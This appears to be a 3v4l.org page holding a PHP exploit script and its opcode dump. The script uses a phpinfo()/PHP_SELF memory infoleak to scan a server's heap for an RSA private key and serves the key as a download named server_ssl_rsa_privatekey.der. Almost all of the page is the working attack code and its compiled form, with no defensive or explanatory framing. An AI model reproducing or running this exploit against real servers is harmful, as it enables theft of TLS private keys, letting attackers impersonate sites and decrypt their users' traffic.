3v4l.org

run code in 300+ PHP versions simultaneously
<?php set_time_limit(0); /* set a starting position for the heap scan */ /* script will crash immediately if trying to access illegal memory */ $starthi = 0xb788; if (isset($_GET['start'])) { $starthi = $_GET['start'] + 0; } /* initialize some stuff */ $i = 0; $z = 0; $olddata = ""; $keydata = ""; /* Unfortunately PHP is problematic when it comes to 32bit unsigned numbers - we have to fake it like this */ $PHP_SELF = ($starthi << 16) | $i; while (true) { $data = ""; while (strlen($data) < 4096) { /* perform the infoleak */ ob_start(); @phpinfo(INFO_VARIABLES); $var = ob_get_contents(); ob_get_clean(); /* extract the leaked data from output */ $r = preg_match("|PHP_SELF.</td><td class=\"v\">(.*).</td></tr>|mUs",$var,$match); /* we need to handle the "no value" case */ $var = $match[1]; if ($var == "<i>no value</i>") $var = chr(0); else $var .= chr(0); /* Ohhh and we need to decode the entities added by PHP */ $var = html_entity_decode($var,ENT_QUOTES,"ISO-8859-1"); /* Append leaked data to output */ $data .= $var; $i += strlen($var); /* $i will keep the lower 16 bits and $z the upper 16 bits */ if ($i > 0xffff) $z++; $i = $i & 0xffff; /* recalculate next address */ $PHP_SELF = ($starthi + $z)<<16 | $i; } /* we combine the data with the previous data to handle partial keys */ $check = $olddata . $data; $olddata = $data; $data = $check; /* Now check if we have a key candidate */ $position = strpos($data, "\x30\x82"); if ($position !== false && $position < strlen($data)-1024) { if (substr($data, $position+4, 4) == "\x02\x01\x00\x02") { $length = ord($data[$position+2])*256+ord($data[$position+3])+4; $keydata = substr($data, $position, $length); // Assume an exponent of 0x10001 to really find a RSA key and not a DSA one if (strpos($keydata, "\x01\x00\x01") > 0) break; } } } if (strlen($keydata) == 0) { header("Content-type: text/plain"); die ("Unexpected error!!!"); } header("Content-type: application/octet-stream"); header("Content-Disposition: attachment; filename=\"server_ssl_rsa_privatekey.der\""); echo $keydata; ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 7, Position 2 = 11
Branch analysis from position: 7
1 jumps found. (Code = 42) Position 1 = 118
Branch analysis from position: 118
2 jumps found. (Code = 44) Position 1 = 119, Position 2 = 19
Branch analysis from position: 119
2 jumps found. (Code = 43) Position 1 = 122, Position 2 = 126
Branch analysis from position: 122
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 126
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 19
1 jumps found. (Code = 42) Position 1 = 64
Branch analysis from position: 64
2 jumps found. (Code = 44) Position 1 = 67, Position 2 = 21
Branch analysis from position: 67
2 jumps found. (Code = 46) Position 1 = 78, Position 2 = 82
Branch analysis from position: 78
2 jumps found. (Code = 43) Position 1 = 83, Position 2 = 118
Branch analysis from position: 83
2 jumps found. (Code = 43) Position 1 = 91, Position 2 = 118
Branch analysis from position: 91
2 jumps found. (Code = 43) Position 1 = 117, Position 2 = 118
Branch analysis from position: 117
1 jumps found. (Code = 42) Position 1 = 119
Branch analysis from position: 119
Branch analysis from position: 118
Branch analysis from position: 118
Branch analysis from position: 118
Branch analysis from position: 82
Branch analysis from position: 21
2 jumps found. (Code = 43) Position 1 = 43, Position 2 = 45
Branch analysis from position: 43
1 jumps found. (Code = 42) Position 1 = 46
Branch analysis from position: 46
2 jumps found. (Code = 43) Position 1 = 57, Position 2 = 58
Branch analysis from position: 57
2 jumps found. (Code = 44) Position 1 = 67, Position 2 = 21
Branch analysis from position: 67
Branch analysis from position: 21
Branch analysis from position: 58
Branch analysis from position: 45
2 jumps found. (Code = 43) Position 1 = 57, Position 2 = 58
Branch analysis from position: 57
Branch analysis from position: 58
Branch analysis from position: 11
filename:       /in/51rfh
function name:  (null)
number of ops:  134
compiled vars:  !0 = $starthi, !1 = $i, !2 = $z, !3 = $olddata, !4 = $keydata, !5 = $PHP_SELF, !6 = $data, !7 = $var, !8 = $r, !9 = $match, !10 = $check, !11 = $position, !12 = $length
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   INIT_FCALL                                               'set_time_limit'
          1        SEND_VAL                                                 0
          2        DO_ICALL                                                 
    6     3        ASSIGN                                                   !0, 46984
    8     4        FETCH_IS                                         ~15     '_GET'
          5        ISSET_ISEMPTY_DIM_OBJ                         0          ~15, 'start'
          6      > JMPZ                                                     ~16, ->11
    9     7    >   FETCH_R                      global              ~17     '_GET'
          8        FETCH_DIM_R                                      ~18     ~17, 'start'
          9        ADD                                              ~19     ~18, 0
         10        ASSIGN                                                   !0, ~19
   13    11    >   ASSIGN                                                   !1, 0
         12        ASSIGN                                                   !2, 0
         13        ASSIGN                                                   !3, ''
         14        ASSIGN                                                   !4, ''
   19    15        SL                                               ~25     !0, 16
         16        BW_OR                                            ~26     !1, ~25
         17        ASSIGN                                                   !5, ~26
   21    18      > JMP                                                      ->118
   23    19    >   ASSIGN                                                   !6, ''
   25    20      > JMP                                                      ->64
   28    21    >   INIT_FCALL                                               'ob_start'
         22        DO_ICALL                                                 
   29    23        BEGIN_SILENCE                                    ~30     
         24        INIT_FCALL                                               'phpinfo'
         25        SEND_VAL                                                 32
         26        DO_ICALL                                                 
         27        END_SILENCE                                              ~30
   30    28        INIT_FCALL                                               'ob_get_contents'
         29        DO_ICALL                                         $32     
         30        ASSIGN                                                   !7, $32
   31    31        INIT_FCALL                                               'ob_get_clean'
         32        DO_ICALL                                                 
   34    33        INIT_FCALL                                               'preg_match'
         34        SEND_VAL                                                 '%7CPHP_SELF.%3C%2Ftd%3E%3Ctd+class%3D%22v%22%3E%28.%2A%29.%3C%2Ftd%3E%3C%2Ftr%3E%7CmUs'
         35        SEND_VAR                                                 !7
         36        SEND_REF                                                 !9
         37        DO_ICALL                                         $35     
         38        ASSIGN                                                   !8, $35
   37    39        FETCH_DIM_R                                      ~37     !9, 1
         40        ASSIGN                                                   !7, ~37
   38    41        IS_EQUAL                                                 !7, '%3Ci%3Eno+value%3C%2Fi%3E'
         42      > JMPZ                                                     ~39, ->45
         43    >   ASSIGN                                                   !7, '%00'
         44      > JMP                                                      ->46
         45    >   ASSIGN_OP                                     8          !7, '%00'
   41    46    >   INIT_FCALL                                               'html_entity_decode'
         47        SEND_VAR                                                 !7
         48        SEND_VAL                                                 3
         49        SEND_VAL                                                 'ISO-8859-1'
         50        DO_ICALL                                         $42     
         51        ASSIGN                                                   !7, $42
   44    52        ASSIGN_OP                                     8          !6, !7
   45    53        STRLEN                                           ~45     !7
         54        ASSIGN_OP                                     1          !1, ~45
   48    55        IS_SMALLER                                               65535, !1
         56      > JMPZ                                                     ~47, ->58
         57    >   PRE_INC                                                  !2
   49    58    >   BW_AND                                           ~49     !1, 65535
         59        ASSIGN                                                   !1, ~49
   52    60        ADD                                              ~51     !0, !2
         61        SL                                               ~52     ~51, 16
         62        BW_OR                                            ~53     !1, ~52
         63        ASSIGN                                                   !5, ~53
   25    64    >   STRLEN                                           ~55     !6
         65        IS_SMALLER                                               ~55, 4096
         66      > JMPNZ                                                    ~56, ->21
   57    67    >   CONCAT                                           ~57     !3, !6
         68        ASSIGN                                                   !10, ~57
   58    69        ASSIGN                                                   !3, !6
   59    70        ASSIGN                                                   !6, !10
   62    71        INIT_FCALL                                               'strpos'
         72        SEND_VAR                                                 !6
         73        SEND_VAL                                                 '0%82'
         74        DO_ICALL                                         $61     
         75        ASSIGN                                                   !11, $61
   63    76        TYPE_CHECK                                  1018  ~63     !11
         77      > JMPZ_EX                                          ~63     ~63, ->82
         78    >   STRLEN                                           ~64     !6
         79        SUB                                              ~65     ~64, 1024
         80        IS_SMALLER                                       ~66     !11, ~65
         81        BOOL                                             ~63     ~66
         82    > > JMPZ                                                     ~63, ->118
   64    83    >   INIT_FCALL                                               'substr'
         84        SEND_VAR                                                 !6
         85        ADD                                              ~67     !11, 4
         86        SEND_VAL                                                 ~67
         87        SEND_VAL                                                 4
         88        DO_ICALL                                         $68     
         89        IS_EQUAL                                                 $68, '%02%01%00%02'
         90      > JMPZ                                                     ~69, ->118
   65    91    >   INIT_FCALL                                               'ord'
         92        ADD                                              ~70     !11, 2
         93        FETCH_DIM_R                                      ~71     !6, ~70
         94        SEND_VAL                                                 ~71
         95        DO_ICALL                                         $72     
         96        MUL                                              ~73     $72, 256
         97        INIT_FCALL                                               'ord'
         98        ADD                                              ~74     !11, 3
         99        FETCH_DIM_R                                      ~75     !6, ~74
        100        SEND_VAL                                                 ~75
        101        DO_ICALL                                         $76     
        102        ADD                                              ~77     ~73, $76
        103        ADD                                              ~78     ~77, 4
        104        ASSIGN                                                   !12, ~78
   66   105        INIT_FCALL                                               'substr'
        106        SEND_VAR                                                 !6
        107        SEND_VAR                                                 !11
        108        SEND_VAR                                                 !12
        109        DO_ICALL                                         $80     
        110        ASSIGN                                                   !4, $80
   68   111        INIT_FCALL                                               'strpos'
        112        SEND_VAR                                                 !4
        113        SEND_VAL                                                 '%01%00%01'
        114        DO_ICALL                                         $82     
        115        IS_SMALLER                                               0, $82
        116      > JMPZ                                                     ~83, ->118
   69   117    > > JMP                                                      ->119
   21   118    > > JMPNZ                                                    <true>, ->19
   74   119    >   STRLEN                                           ~84     !4
        120        IS_EQUAL                                                 ~84, 0
        121      > JMPZ                                                     ~85, ->126
   75   122    >   INIT_FCALL                                               'header'
        123        SEND_VAL                                                 'Content-type%3A+text%2Fplain'
        124        DO_ICALL                                                 
   76   125      > EXIT                                                     'Unexpected+error%21%21%21'
   79   126    >   INIT_FCALL                                               'header'
        127        SEND_VAL                                                 'Content-type%3A+application%2Foctet-stream'
        128        DO_ICALL                                                 
   80   129        INIT_FCALL                                               'header'
        130        SEND_VAL                                                 'Content-Disposition%3A+attachment%3B+filename%3D%22server_ssl_rsa_privatekey.der%22'
        131        DO_ICALL                                                 
   81   132        ECHO                                                     !4
   83   133      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
176.44 ms | 1408 KiB | 35 Q